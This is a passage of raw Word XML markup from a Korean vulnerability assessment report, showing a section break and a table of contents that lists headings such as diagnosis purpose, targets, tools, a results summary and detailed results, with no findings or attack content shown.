                      </w:r>
                      <w:r w:rsidR="000E6CD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v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A34665" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9B20AE" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
        <w:sectPr w:rsidR="005D30D0" w:rsidSect="0042161F">
          <w:headerReference w:type="default" r:id="rId14"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1985" w:right="1134" w:bottom="1134" w:left="1134" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3941A7A6" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00545AC8" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r w:rsidRPr="00545AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>목 차</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25108C1C" w14:textId="2AF5F477" w:rsidR="00B9713E" w:rsidRDefault="005D30D0">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>TOC \o "1-3" \h \z \u</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc209094538" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>개요</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094538 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="0041664A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06DBC6F9" w14:textId="5A902356" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094539" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>1.1.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>진단 목적</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094539 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="386CE5CC" w14:textId="6AFAF2F3" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094540" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>1.2.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>진단 대상</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094540 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44B88472" w14:textId="2078A75A" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094541" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>1.3.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>진단 일정</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094541 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75BDF23C" w14:textId="02BCCD26" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094542" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>1.4.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>진단 인력</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094542 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1302EC6C" w14:textId="2ACFC582" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094543" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>진단 항목 및 도구</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094543 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7234B230" w14:textId="3F5AE7B6" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094544" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>2.1.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>취약점진단 진단 도구</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094544 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AA4DC29" w14:textId="1EB9C82A" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094545" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>2.2.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>진단 항목</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094545 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="519F137E" w14:textId="460C6C28" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094546" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>취약점진단 결과요약</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094546 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EBBB99D" w14:textId="79FC6F26" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094550" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>3.1.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>총평</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094550 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62CCAB01" w14:textId="2DB4AC1D" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094551" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>3.2.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>대상별 취약점 요약</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094551 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60C91F93" w14:textId="140873CE" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094552" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>4.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>취약점진단 상세결과</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094552 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1ECD3EEB" w14:textId="379AB2CB" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094553" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>4.1.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
